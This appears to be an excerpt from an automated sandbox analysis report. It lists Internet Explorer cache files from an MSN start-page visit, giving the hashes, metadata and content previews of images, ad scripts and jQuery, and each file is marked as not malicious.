                                                                                Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........(J....QIDAT8O....DA.....F...md5"...R%6.].@.............D.....Q...}s.0...~.7svv.......;.%..\.....]...LK$...!.u....3.M.+.U..a..~O......O.XR=.s.../....I....l.=9$...........~A.,. ..<...Yq.9.8...I.&.....V. ..M.\..V6.....O.........!y:p.9..l......"9.....9.7.N.o^[..d......]g.%..L.1...B.1k....k....v#._.w/...w...h..\....W...../..S.`.f.......IEND.B`.
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\BBK9Hzy[1].png
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                Category:downloaded
                                                                                Size (bytes):541
                                                                                Entropy (8bit):7.367354185122177
                                                                                Encrypted:false
                                                                                SSDEEP:12:6v/78/W/6T4onImZBfSKTIxS9oXhTDxfIR3N400tf3QHPK5jifFpEPy:U/6rIcBfYxGoxfxfrLqHPKhif7T
                                                                                MD5:4F50C6271B3DF24A75AD8E9822453DA3
                                                                                SHA1:F8987C61D1C2D2EC12D23439802D47D43FED3BDF
                                                                                SHA-256:9AE6A4C5EF55043F07D888AB192D82BB95D38FA54BB3D41F701863239E16E21C
                                                                                SHA-512:AFA483EAFEAF31530487039FB1727B819D4E61E54C395BA9553C721FB83C3B16EDF88E60853387A4920AB8F7DFAD704D1B6D4C12CDC302BE05427FC90E7FACC8
                                                                                Malicious:false
                                                                                IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBK9Hzy.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs.................IDAT8O.Q.K[A...M^L../+....`4..x.GAiQb..E<..A.x..'!.P(-..x....`.,...D.)............ov..Yx.`_.4...@._ .r...w.$.H....W...........mj."...IR~f...J..D.|q.......~.<....<.I(t.q.....t...0.....h,.1.......\.1.........m......+.zB..C.....^.u:.....j.o*..j....\../eH.,......}...d-<!t.\.>..X.y.W....evg.Jho..=w*.*Y...n.@.....e.X.z.G.........(4.H...P.L.:".%tls....jq..5....<.)~....x...]u(..o./H.....Hvf....*E.D.).......j/j.=]......Z.<Z....IEND.B`.
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\BBVuddh[1].png
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                Category:downloaded
                                                                                Size (bytes):304
                                                                                Entropy (8bit):6.758580075536471
                                                                                Encrypted:false
                                                                                SSDEEP:6:6v/lhPkR/ChmU5nXyNbWgaviGjZ/wtDi6Xxl32inTvUI8zVp:6v/78/e5nXyNb4lueg32au/
                                                                                MD5:245557014352A5F957F8BFDA87A3E966
                                                                                SHA1:9CD29E2AB07DC1FEF64B6946E1F03BCC0A73FC5C
                                                                                SHA-256:0A33B02F27EE6CD05147D81EDAD86A3184CCAF1979CB73AD67B2434C2A4A6379
                                                                                SHA-512:686345FD8667C09F905CA732DB98D07E1D72E7ECD9FD26A0C40FEE8E8985F8378E7B2CB8AE99C071043BCB661483DBFB905D46CE40C6BE70EEF78A2BCDE94605
                                                                                Malicious:false
                                                                                IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........+......IDAT8O...P...3.....v..`0.}...'..."XD.`.`.5.3. ....)...a.-.............d.g.mSC.i..%.8*].}....m.$I0M..u.. ...,9.........i....X..<.y..E..M....q... ."...,5+..]..BP.5.>R....iJ.0.7.|?.....r.\-Ca......IEND.B`.
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\a5ea21[1].ico
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:PNG image data, 32 x 32, 8-bit/color RGB, non-interlaced
                                                                                Category:downloaded
                                                                                Size (bytes):758
                                                                                Entropy (8bit):7.432323547387593
                                                                                Encrypted:false
                                                                                SSDEEP:12:6v/792/6TCfasyRmQ/iyzH48qyNkWCj7ev50C5qABOTo+CGB++yg43qX4b9uTmMI:F/6easyD/iCHLSWWqyCoTTdTc+yhaX4v
                                                                                MD5:84CC977D0EB148166481B01D8418E375
                                                                                SHA1:00E2461BCD67D7BA511DB230415000AEFBD30D2D
                                                                                SHA-256:BBF8DA37D92138CC08FFEEC8E3379C334988D5AE99F4415579999BFBBB57A66C
                                                                                SHA-512:F47A507077F9173FB07EC200C2677BA5F783D645BE100F12EFE71F701A74272A98E853C4FAB63740D685853935D545730992D0004C9D2FE8E1965445CAB509C3
                                                                                Malicious:false
                                                                                IE Cache URL:https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
                                                                                Preview: .PNG........IHDR... ... ............pHYs.................vpAg... ... ........eIDATH...o.@../..MT..KY..P!9^....:UjS..T."P.(R.PZ.KQZ.S. ....,v2.^.....9/t....K..;_ }'.....~..qK..i.;.B..2.`.C...B........<...CB.....).....;..Bx..2.}.. ._>w!..%B..{.d...LCgz..j/.7D.*.M.*.............'.HK..j%.!DOf7......C.]._Z.f+..1.I+.;.Mf....L:Vhg..[.. ..O:..1.a....F..S.D...8<n.V.7M.....cY@.......4.D..kn%.e.A.@lA.,>\.Q|.N.P........<.!....ip...y..U....J...9...R..mgp}vvn.f4$..X.E.1.T...?.....'.wz..U...../[...z..(DB.B(....-........B.=m.3......X...p...Y........w..<.........8...3.;.0....(..I...A..6f.g.xF..7h.Gmq|....gz_Z...x..0F'..........x..=Y}.,jT..R......72w/...Bh..5..C...2.06`........8@A..."zTXtSoftware..x.sL.OJU..MLO.JML.../.....M....IEND.B`.
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\checksync[1].htm
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:HTML document, ASCII text, with very long lines
                                                                                Category:dropped
                                                                                Size (bytes):20808
                                                                                Entropy (8bit):5.301767642140402
                                                                                Encrypted:false
                                                                                SSDEEP:384:RqAGcVXlblcqnzleZSug2f5vzBgF3OZOsQWwY4RXrqt:+86qhbz2RmF3OssQWwY4RXrqt
                                                                                MD5:97A17EFCA6ECAE418CACBBF6AE41B0B1
                                                                                SHA1:31235CDB60298018C1C0D1EFE712FF3281A7B29B
                                                                                SHA-256:00FFE70B03F4DF3A0D653D15DF9DB3D4451AD931953B44F9541DD59D8538FD90
                                                                                SHA-512:DA7EE38B51F31BDA399E68AC9D6CA7532C846C7BF466E94F40CB7C6382F1A64F0567A3BCE85D12E1F37F84F4765FF703405309E6A545FE8D482B0EFEAAE9E525
                                                                                Malicious:false
                                                                                Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":75,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/cslogger.
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\checksync[2].htm
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:HTML document, ASCII text, with very long lines
                                                                                Category:dropped
                                                                                Size (bytes):20808
                                                                                Entropy (8bit):5.301767642140402
                                                                                Encrypted:false
                                                                                SSDEEP:384:RqAGcVXlblcqnzleZSug2f5vzBgF3OZOsQWwY4RXrqt:+86qhbz2RmF3OssQWwY4RXrqt
                                                                                MD5:97A17EFCA6ECAE418CACBBF6AE41B0B1
                                                                                SHA1:31235CDB60298018C1C0D1EFE712FF3281A7B29B
                                                                                SHA-256:00FFE70B03F4DF3A0D653D15DF9DB3D4451AD931953B44F9541DD59D8538FD90
                                                                                SHA-512:DA7EE38B51F31BDA399E68AC9D6CA7532C846C7BF466E94F40CB7C6382F1A64F0567A3BCE85D12E1F37F84F4765FF703405309E6A545FE8D482B0EFEAAE9E525
                                                                                Malicious:false
                                                                                Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":75,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/cslogger.
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\de-ch[1].htm
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):423508
                                                                                Entropy (8bit):5.442136280792138
                                                                                Encrypted:false
                                                                                SSDEEP:3072:GJIJUSxx+nstaFfTxGLY6TVSr4fAl3VE3YUy3CtpNug9lUW93tKQls2xxOd+fSLi:GJIFOnvr4UVEJ57uulUW93JxOd+f/
                                                                                MD5:13DDC71E3F77460BEDD739D9945AF890
                                                                                SHA1:EEE938DB1C76A9B58CFA1979C19096C5F67720BF
                                                                                SHA-256:3B9EF470AE88FC4AC9E230BA3045761B32D58AD916E44B72E8F523AD7C83FF6B
                                                                                SHA-512:202104BB27D28B1B800C133927742CFC9AC4EB84B8BA54D91554CD7EEFE2854E4193DFB01CCEEF6639AB46338ACB1FCB1B4C9B966059B3D1D697D56E93303618
                                                                                Malicious:false
                                                                                Preview: <!DOCTYPE html><html prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#" lang="de-CH" class="hiperf" dir="ltr" >.. <head data-info="v:20210208_31257824;a:c99b6d87-37ec-4250-9dd0-0479fdb8ff89;cn:8;az:{did:951b20c4cd6d42d29795c846b4755d88, rid: 8, sn: neurope-prod-hp, dt: 2021-02-15T14:40:22.7343651Z, bt: 2021-02-08T21:20:57.5642255Z};ddpi:1;dpio:;dpi:1;dg:tmx.pc.ms.ie10plus;th:start;PageName:startPage;m:de-ch;cb:;l:de-ch;mu:de-ch;ud:{cid:,vk:homepage,n:,l:de-ch,ck:};xd:BBqgbZW;ovc:f;al:;fxd:f;xdpub:2021-01-12 22:59:27Z;xdmap:2021-02-15 23:57:14Z;axd:;f:msnallexpusers,muidflt11cf,muidflt13cf,muidflt46cf,muidflt49cf,muidflt315cf,startedge2cf,bingcollabedge2cf,pnehp2cf,starthp2cf,tokenblockgc,article1cf,gallery5cf,onetrustpoplive,1s-bing-news,vebudumu04302020,bbh20200521msn,shophp2cf,prong1aat,csmoney5cf,prg-gitconfigs-t11;userOptOut:false;userOptOutOptions:" data-js="{&quot;dpi&quot;:1.0,&quot;ddpi&quot;:1.0,&quot;dpio&quot;:null,&quot;forcedpi&quot;:null,&quot;dms&quot;:6000,
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\http___cdn.taboola.com_libtrc_static_thumbnails_93d4933b9954eadbe7709e6a17080eca[1].jpg
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
                                                                                Category:downloaded
                                                                                Size (bytes):21766
                                                                                Entropy (8bit):7.972079328084609
                                                                                Encrypted:false
                                                                                SSDEEP:384:L+OKwhO3hGWjohrKuJbHsDhnXddsN1DuXC3MF7sMyqjR52G17KGWL2s+T0WxPtEi:L+OqctrKuKDhnXknC5F7XF/1+rAx1EEj
                                                                                MD5:099C7C252BEB96B217B59FBB7B1070BA
                                                                                SHA1:1FDACB3AE98128B82C75201AB0BC8A2A80B61272
                                                                                SHA-256:75C9F3D11F764C26E3EB55805D96421A52156D43E52C1A75B995A5B427536079
                                                                                SHA-512:D2AD1C12EE090134A8415B384F05234D19CAF844E68AA716489D3CB0BC262279A463D3250A912469765E9C0B1AFA6FB50B078BA124743B346D5C1221B64EE5D1
                                                                                Malicious:false
                                                                                IE Cache URL:https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F93d4933b9954eadbe7709e6a17080eca.jpg
                                                                                Preview: ......JFIF.....................................................................&""&0-0>>T.............................)......)$,$!$,$A3--3AK?<?K[QQ[rlr.........7...............6.................................................................../G..%.`. ....@L...$.........T3Tv..\b..O@...p..Kmh.".p.P!.6....#Y.......W....i9.@[.l-l2,....3.QG..H2j...7..[x...^.....m...Wv...&A.=..R...M.e.1..M.G...j.Jt.........hF.........5...A...,..9..I..y...#..]x.8.3...~3.....Q.}y....-......`a..phe...+..m...^..=Y..0.644....x .....!..B..R5`...!M.Tc..uP..oAtp...o....</.A(.V...5....n).$......P..k.G..o.........V.#(P............".d..&(p.....b~.r..9..p.6j.=7.......a....oYOh.....D.tc.o..G.).._;..=H-.z...u].zs...<M.^i....r..C>...x7...m..HL../......}*.P.\.w....nU.....>.k.....(.~1...G..k.....<..j..G.|...z.a..c....(~...gE......~.......z~B....H...;..]8{'....r..uo{h3.x.n....5.... x_].Z...G.w.|.*h,..R...cd.9.\....?b.{eU....K.%.[..J5si...O....|...z..Euw../..iTc..J9.+.........Wn..'.
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\http___cdn.taboola.com_libtrc_static_thumbnails_f52032391a565ce1f56d11eb2ad607c3[1].jpg
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
                                                                                Category:downloaded
                                                                                Size (bytes):8591
                                                                                Entropy (8bit):7.946592792308832
                                                                                Encrypted:false
                                                                                SSDEEP:192:/8Dt7Ky0YIqFRaAMRcx0y/W1OEhFI+I6eOy:/8D9IAM9OC0X5
                                                                                MD5:39E5B2258A745DC9316075FFF8A0AC39
                                                                                SHA1:3FD7D0FD193810973CCE07DE9B693FDE6F9874D3
                                                                                SHA-256:EEF9FD0054A8E7DAE10C188C3EFCD1542E22BCD1FC17A70ADF994CC2D54B8FA0
                                                                                SHA-512:893139044F05EA5727D27EF1672F43E6B5E8D4371104C3EC645EA464D2D1995443FFD593115734F43EB86C4E1E9B24830F2E4826206D0EA9F720840D242741E2
                                                                                Malicious:false
                                                                                IE Cache URL:https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Ff52032391a565ce1f56d11eb2ad607c3.jpg
                                                                                Preview: ......JFIF..........................................."......".$...$.6*&&*6>424>LDDL_Z_||.............................."......".$...$.6*&&*6>424>LDDL_Z_||.......7...."..........4....................................................................9...%.q........WF.....G....'X4.2m.s.1..0..|.......=..]:F5.HPz<.4..W~;.U).r...8.d..........=.;[..3.tZ.....wgNG.....8..........>l.......?.{...!`.I..fD........E......sq...z..X.{...>^....z..,`...3.d.P...>q.OG......l..kui..L....>........=...8P.....<7N.N|..t..va..gq...p....{YI-.u.R.E....]..).....|{...........-......3........iYn..O/..L.....D..m...Rde...#".h..$.e.\yt...............!.:./..Fm.T...N.'..pu\..$.{.....x....oS.Y....$tc...0...:;3..g.U.`...%._GJ.r.E..7?.."g......"....M..(.a`H.i.7..d.4YY "..W.i.Q.....q...,....Z...5..Y.Z.+b^..3..(.%.....<;....n.X.~...N...v.^.qA.88..Z...).b.........].c......j..P.R.'...g.{..N.'.X...1.1.d.h..6lfU<8.IL..?Q...j..B..K...M-Lp...\.&.....K.j..<.?....:...zk%.M....>.V.ae..[...
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\https___gallery-pl.go-game.io_uploads_2020_01_RAD_Aina_Spear_B77389_1000x600_NoOS_English&IMG=1NPP[1].jpg
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
                                                                                Category:downloaded
                                                                                Size (bytes):25033
                                                                                Entropy (8bit):7.9775299540073155
                                                                                Encrypted:false
                                                                                SSDEEP:384:/AHGBPmCHUVCUW2qIgHqWvqSZlobMowuipLenfcH0JdLWUPo0x/QmUr1CY4NR6Zu:/zFRHUoUW2q8VSZ0MoN2Lt0VQmdY6row
                                                                                MD5:8000A20E04C4F8C73B475DF0B7DCE564
                                                                                SHA1:8E92748129EF7F7D63CC55A93F6546A2396A966C
                                                                                SHA-256:F523BF27D421585556127606833D983DE85DCB767A943C69B0BB50EB972DAE89
                                                                                SHA-512:442B1C187317998716B269E1A8BE6BA71E4675D69C8D12AAA74D61DDF3F85F8702EAEA7C1F6A7D108EC74EC344847DDA23F5C375AD49EC382A00BA325316DC1A
                                                                                Malicious:false
                                                                                IE Cache URL:https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/https%3A%2F%2Fgallery-pl.go-game.io%2Fuploads%2F2020%2F01%2FRAD_Aina_Spear_B77389_1000x600_NoOS_English%26IMG%3D1NPP.jpg
                                                                                Preview: ......JFIF..........................................."......".$...$.6*&&*6>424>LDDL_Z_||.......................$.....$6"(""("60:/,/:0VD<<DVdTOTdylly............7...............3...............................................................).x........y..i...1.i....5..Y....>.=.#.....mI5h.&.e[..pg...FtdTe.Ef_..D.[.;..".......|g.@o.XS.>m82.qO.rt..t..#.....s.h.~m....D...o._F..8?m..2.....5.i2q...d.a.U._.8........>..1Dk....n0.T.a..].,$DE.X...9..".NXJA..+p{..yL../#H..k....*..../..f.:.`*.{C.b.RtJ.VB^CZ...W...K..,.Jj.f.."..{*...3....U.hr.tS.wy.}y.:.y.R`..m....}...|..z...;..\.Z.......VB.....v.VQ.#..|.(2....E....+.........X:...Q..[.a..E..4.!...u.I?9..S....n......n2..'y..J.z]........ ..y...'...7K.7V........!I......a....c3..$z....%.A......l....b..W..$:..|.........q..q....%...e{...)=..A..`.."...m.^,...5.......X.......K/....NJ....W.r....6.hRfp..q..%.w....X..........lY)A.%r'..K.q.6U.M....2.u......yzH...+.........,!e..U.{..,....$e.<...D8.|1.]..?...%....
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\jquery-2.1.1.min[1].js
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                Category:downloaded
                                                                                Size (bytes):84249
                                                                                Entropy (8bit):5.369991369254365
                                                                                Encrypted:false
                                                                                SSDEEP:1536:DPEkjP+iADIOr/NEe876nmBu3HvF38NdTuJO1z6/A4TqAub0R4ULvguEhjzXpa9r:oNM2Jiz6oAFKP5a98HrY
                                                                                MD5:9A094379D98C6458D480AD5A51C4AA27
                                                                                SHA1:3FE9D8ACAAEC99FC8A3F0E90ED66D5057DA2DE4E
                                                                                SHA-256:B2CE8462D173FC92B60F98701F45443710E423AF1B11525A762008FF2C1A0204
                                                                                SHA-512:4BBB1CCB1C9712ACE14220D79A16CAD01B56A4175A0DD837A90CA4D6EC262EBF0FC20E6FA1E19DB593F3D593DDD90CFDFFE492EF17A356A1756F27F90376B650
                                                                                Malicious:false
                                                                                IE Cache URL:https://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquery-2.1.1.min.js
                                                                                Preview: /*! jQuery v2.1.1 | (c) 2005, 2014 jQuery Foundation, Inc. | jquery.org/license */..!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l=a.document,m="2.1.1",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return n.each(this,a,b)},map:function(a){return this.pushStack(n.map(this,funct
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\location[1].js
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:downloaded
                                                                                Size (bytes):182
                                                                                Entropy (8bit):4.685293041881485
                                                                                Encrypted:false
                                                                                SSDEEP:3:LUfGC48HlHJ2R4OE9HQnpK9fQ8I5CMnRMRU8x4RiiP22/90+apWyRHfHO:nCf4R5ElWpKWjvRMmhLP2saVO
                                                                                MD5:C4F67A4EFC37372559CD375AA74454A3
                                                                                SHA1:2B7303240D7CBEF2B7B9F3D22D306CC04CBFBE56
                                                                                SHA-256:C72856B40493B0C4A9FC25F80A10DFBF268B23B30A07D18AF4783017F54165DE
                                                                                SHA-512:1EE4D2C1ED8044128DCDCDB97DC8680886AD0EC06C856F2449B67A6B0B9D7DE0A5EA2BBA54EB405AB129DD0247E605B68DC11CEB6A074E6CF088A73948AF2481
                                                                                Malicious:false
                                                                                IE Cache URL:https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
                                                                                Preview: jsonFeed({"country":"CH","state":"ZH","stateName":"Zurich","zipcode":"8152","timezone":"Europe/Zurich","latitude":"47.43000","longitude":"8.57180","city":"Zurich","continent":"EU"});
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\medianet[1].htm
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:HTML document, ASCII text, with very long lines
                                                                                Category:downloaded
                                                                                Size (bytes):384616
                                                                                Entropy (8bit):5.484073934922233
                                                                                Encrypted:false
                                                                                SSDEEP:6144:4mJ9Tw5qIZvbzH0m9ZnGQVvgz5RCu1b5xKSv7IW:VIZvvPnGQVvgnxV7K07IW
                                                                                MD5:EE243872DE41542B407AD43FB9DB8E40
                                                                                SHA1:D28FC0621E17057421B67B95B89E5FE54C6BFFBE
                                                                                SHA-256:9EBCED9C193CDDAF3BA63891D21D04A815783FFBD1F40232CAF4B3CD691C597D
                                                                                SHA-512:8E17F3BB3ADB985540E565C0C5591B0459595C747F8950332EC2FC94DFB77FB597038A466358C1CD9304990193236031EFC68610B1C3022AF3B0AE85DE1FDF76
                                                                                Malicious:false
                                                                                IE Cache URL:https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
                                                                                Preview: <html>.<head></head>.<body style="margin: 0px; padding: 0px; background-color: transparent;">.<script language="javascript" type="text/javascript">window.mnjs=window.mnjs||{},window.mnjs.ERP=window.mnjs.ERP||function(){"use strict";for(var a="",l="",c="",f={},u=encodeURIComponent(navigator.userAgent),g=[],e=0;e<3;e++)g[e]=[];function m(e){void 0===e.logLevel&&(e={logLevel:3,errorVal:e}),3<=e.logLevel&&g[e.logLevel-1].push(e)}function n(){var e=0;for(s=0;s<3;s++)e+=g[s].length;if(0!==e){for(var n,o=new Image,t=f.lurl||"https://lg3-a.akamaihd.net/nerrping.php",r="",i=0,s=2;0<=s;s--){for(e=g[s].length,0;0<e;){if(n=1===s?g[s][0]:{logLevel:g[s][0].logLevel,errorVal:{name:g[s][0].errorVal.name,type:a,svr:l,servname:c,message:g[s][0].errorVal.message,line:g[s][0].errorVal.lineNumber,description:g[s][0].errorVal.description,stack:g[s][0].errorVal.stack}},n=n,!((n="object"!=typeof JSON||"function"!=typeof JSON.stringify?"JSON IS NOT SUPPORTED":JSON.stringify(n)).length+r.length<=1
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\medianet[2].htm
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:HTML document, ASCII text, with very long lines
                                                                                Category:downloaded
                                                                                Size (bytes):384616
                                                                                Entropy (8bit):5.484076610902128
                                                                                Encrypted:false
                                                                                SSDEEP:6144:4mJ9Tw5qIZvbzH0m9ZnGQVvgz5RCu1bCxKSv7IW:VIZvvPnGQVvgnxVOK07IW
                                                                                MD5:9A7455480608F69BAF9C4B25705AF607
                                                                                SHA1:FF3880EBAEB46B731655A04802CED8273910FB35
                                                                                SHA-256:40183F2A611FEEDC597D42CE1992CB9FD4B9BE762B35105F98EEC38939DF01B3
                                                                                SHA-512:7576E386EA17FE8621671A3DF922E715FCCC48525AF72DCFCF0BE1F1C9B5FA5DCAA038AF859783EAB27E24EE0B182BB17593B4C6A899491E247849CDA5F27070
                                                                                Malicious:false
                                                                                IE Cache URL:https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
                                                                                Preview: <html>.<head></head>.<body style="margin: 0px; padding: 0px; background-color: transparent;">.<script language="javascript" type="text/javascript">window.mnjs=window.mnjs||{},window.mnjs.ERP=window.mnjs.ERP||function(){"use strict";for(var a="",l="",c="",f={},u=encodeURIComponent(navigator.userAgent),g=[],e=0;e<3;e++)g[e]=[];function m(e){void 0===e.logLevel&&(e={logLevel:3,errorVal:e}),3<=e.logLevel&&g[e.logLevel-1].push(e)}function n(){var e=0;for(s=0;s<3;s++)e+=g[s].length;if(0!==e){for(var n,o=new Image,t=f.lurl||"https://lg3-a.akamaihd.net/nerrping.php",r="",i=0,s=2;0<=s;s--){for(e=g[s].length,0;0<e;){if(n=1===s?g[s][0]:{logLevel:g[s][0].logLevel,errorVal:{name:g[s][0].errorVal.name,type:a,svr:l,servname:c,message:g[s][0].errorVal.message,line:g[s][0].errorVal.lineNumber,description:g[s][0].errorVal.description,stack:g[s][0].errorVal.stack}},n=n,!((n="object"!=typeof JSON||"function"!=typeof JSON.stringify?"JSON IS NOT SUPPORTED":JSON.stringify(n)).length+r.length<=1
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\otBannerSdk[1].js
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                Category:downloaded
                                                                                Size (bytes):353215
                                                                                Entropy (8bit):5.298793785430684
                                                                                Encrypted:false
                                                                                SSDEEP:3072:BpqAkqNs7z+NwHr5GR74A+x8sP/An4bb4yxL/Z8NdWRHnoVVMyDkpZ:B0C8zZ5G+x8sP/Ani4yxDAdWRHoVVAZ
                                                                                MD5:9982BA07340077CE7240B75C6C6FCBB4
                                                                                SHA1:D776E39E13F151C5ED2F7E5761EDE13D9CC72D27
                                                                                SHA-256:87C99BCF98F3DA7D1429DAC8184E3212634B65706CE7740CE940D1553B57DAAA
                                                                                SHA-512:3EEB895128D38BBBE4FDE8CD71B4FC563C38FFA2F1BCBB3A323D280B4812B0B111DEC1D745BE8EE8F792F7977978FFF03BB00C795C3F5CAFE6E62B3EDF2E88FD
                                                                                Malicious:false
                                                                                IE Cache URL:https://www.msn.com/_h/e012d846/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/otBannerSdk.js
